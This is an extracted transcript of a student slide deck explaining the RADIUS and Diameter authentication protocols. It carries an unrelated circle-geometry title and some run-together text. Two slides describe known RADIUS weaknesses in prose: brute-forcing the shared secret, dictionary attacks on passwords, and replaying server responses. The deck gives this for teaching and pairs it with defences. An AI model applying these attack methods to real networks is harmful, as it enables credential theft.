2.8 – Circles. TermPictureFormula Circumference r = radius d = diameter.
Diameter and Radius
-
Upload
atul-kumar-srivastava -
Category
Documents
-
view
222 -
download
0
Transcript of Diameter and Radius
-
7/30/2019 Diameter and Radius
1/18
RADIUS & Diameter
Protocol
Presented By:
Atul Kumar Srivastava(2017)
Vishal sangale(2009)
Prashant Pandey(2004)
-
7/30/2019 Diameter and Radius
2/18
RADIUS - Introduction :
RADIUS is an application level protocol that carries authentication, authorization andconfiguration information between a Network Access Server (NAS) and a SharedAuthentication Server.
A standardized protocol is required between the access server and the userinformation repository in order to exchange authentication-, authorization-, and
accounting-related information. The RADIUS protocol was designed to provide asimple, but efficient, way to deliver such AAA capability.
Key Featuresof RADIUS :
Client Server model Network Security
Flexible Authentication mechanism
Extensible protocol
-
7/30/2019 Diameter and Radius
3/18
Terminology :
Service
Session
Silently discard
Access-Request
Access-Accept
-
7/30/2019 Diameter and Radius
4/18
RADIUS Overview :
Authentication
Request
Username &
Password
Authentication
Acknowledgement
User Radius
Client
Radius
Server
-
7/30/2019 Diameter and Radius
5/18
Authentication and Authorization :
Access Request Frame
Access-Reject
or Access-Challengeor Access-Accept
Radius
Client
Radius
Server
-
7/30/2019 Diameter and Radius
6/18
Accounting
Built-in accounting schemes:
Unix accounting
Accounting data are stored in files and can be viewed using radwho and
radlast commands
Detailed accounting
The detailed accounting information is stored in plain text format. Theresulting files can easily be parsed using standard text processing tool.
SQL accounting
information stores it in an SQL database, processed using standard SQL
queries.
Radius is extensible
-
7/30/2019 Diameter and Radius
7/18
Packet Frame:
Details
Code
Identifier
Length
Authenticator- Value used to authenticate the reply from the RADIUS server
Attributes - The data
-
7/30/2019 Diameter and Radius
8/18
Client Server Sequence
NAS sends encrypted user info with
access request
Access accept with IP-address,
network mask, allowed session time,
etc
Accounting Phase starts withAccounting Request
When user logs out accounting phase
ends with NAS sending an
'Accounting-request (Stop)' with some
additional information.
The RADIUS Server responds with an
'Accounting-response' when the
accounting information is stored.
-
7/30/2019 Diameter and Radius
9/18
Limitations
Response Authenticator Based Shared Secret Attack
Attacker listens to requests and server responses, and pre-compute MD5 state,which is the prefix of the response authenticator:
MD5(Code+ID+Length+ReqAuth+Attrib)
Perform an exhaustive search on shared secret, adding it to the above MD5state each time.
User-Password Attribute Based Shared Secret Attack
Perform an exhaustive search on shared secret.
The attacker attempts a connection to the NAS, and intercepts the access-request.
User-Password Based Password Attack Performs an exhaustive / dictionary attack on password, XORing it with above
MD5 and sending it each time in appropriate attribute.
Possible due to no authentication on request packet.
-
7/30/2019 Diameter and Radius
10/18
Limitations Continued
Shared Secret Hygiene
Viewed as single client
Small key size enabling easy attack
Request Authenticator Based Attacks Passive User-Password Compromise through Repeated Request
Authenticators
Active User-Password Compromise through Repeated RequestAuthenticators
Attacker builds a dictionary as before.
When he predicts he can cause NAS to use a certain ReqAuth, he tries toconnect it and intercepts access-request.
Replay of Server Responses through Repeated Request Authenticators The attacker builds a dictionary with ReqAuth, ID and entire server response.
Most server responses will be access-accept.
-
7/30/2019 Diameter and Radius
11/18
Diameter - Introduction
The Diameter protocol was derived from the RADIUS protocol with a lot of
improvements in different aspects, and is generally believed to be the next
generation Authentication, Authorization, and Accounting (AAA) protocol.
The Diameter protocol was widely used in the IMS architecture for IMS
entities to exchange AAA-related information. Next generation Authentication, Authorization, and Accounting (AAA)
protocol
-
7/30/2019 Diameter and Radius
12/18
Diameter nodes and agents
Diameter is designed as a Peer-To-Peer architecture, and
every host who implements the Diameter protocol can act
as either a client or a server depending on network
deployment
-
7/30/2019 Diameter and Radius
13/18
THREE TYPES OF DIAMETER
AGENTS- Relay Agent
A Relay Agent is used to forward a message to the appropriate
destination, depending on the information contained in the message.
Proxy Agent
A Proxy Agent can also be used to forward messages, but unlike aRelay Agent, a Proxy Agent can modify the message content and,
therefore, provide value-added services, enforce rules on different
messages, or perform administrative tasks for a specific realm.
Redirect AgentA Redirect Agent acts as a centralized configuration repository for
other Diameter nodes. When it receives a message, it checks its routing
table, and returns a response message along with redirection
information to its original sender
-
7/30/2019 Diameter and Radius
14/18
Special agent
Translation Agent
In addition to these agents, there is a special agent called
Translation Agent. The responsibility of this agent, as you
might have guessed, is to convert a message from one
AAA protocol to another
-
7/30/2019 Diameter and Radius
15/18
Diameter packet format
C i f Di t d
-
7/30/2019 Diameter and Radius
16/18
Comparison of Diameter and
RADIUS protocols
Diameter Radius
Transportation Protocol
Connection-Oriented Protocols (TCP
and SCTP) Connectionless Protocol (UDP)
Security Hop-to-Hop, End-to-End Hop-to-Hop
Agent Support Relay, Proxy, Redirect, Translation
Implicit support, which means the
agent behaviors might beimplemented in a RADIUS server
Capabilities Negotiation
Negotiate supported applications and
security level Don't support
Peer Discovery
Static configuration and dynamic
lookup Static configuration
Server Initiated Message
Supported. for example, re-
authentication message, Session
termination Don't support
Maximum Attribute Data Size 16,777,215 octets 255 octets
Vendor-specific Support
Support both vendor-specific
messages and attributes
Support vendor-specific attributes
only
-
7/30/2019 Diameter and Radius
17/18
Summary
RADIUS is a remote authentication protocol.
RADIUS is a de-facto standard for remote authentication.
RADIUS is an extensible protocol, and can support many authentication
methods (e.g. EAP).
RADIUS has several weaknesses.
Usage of stream cipher
Transaction of Access-Request not authenticated at all
The RADIUS specification should require each client use a different Shared Secret.
It should also require the shared secret to be a random bit string at least 16 octets
long that is generated by a PRNG.
DIAMETER brought in to replace RADIUS and fix some of the flaws
Uses TCP
Better transmission level security using IPSEC
-
7/30/2019 Diameter and Radius
18/18
Cont..
In addition to SIP, Diameter is the other core protocol used
in the IP Multimedia Subsystem (IMS) architecture, both
in the service plane and the control plane. IMS defines a
set of reference points between different IMS entities and
some of them use Diameter as the underlying protocol toexchange subscription-, presence-, and billing-related
messages. For example, the Sh reference point in IMS
defined a set of Diameter messages for subscription and
notification purposes.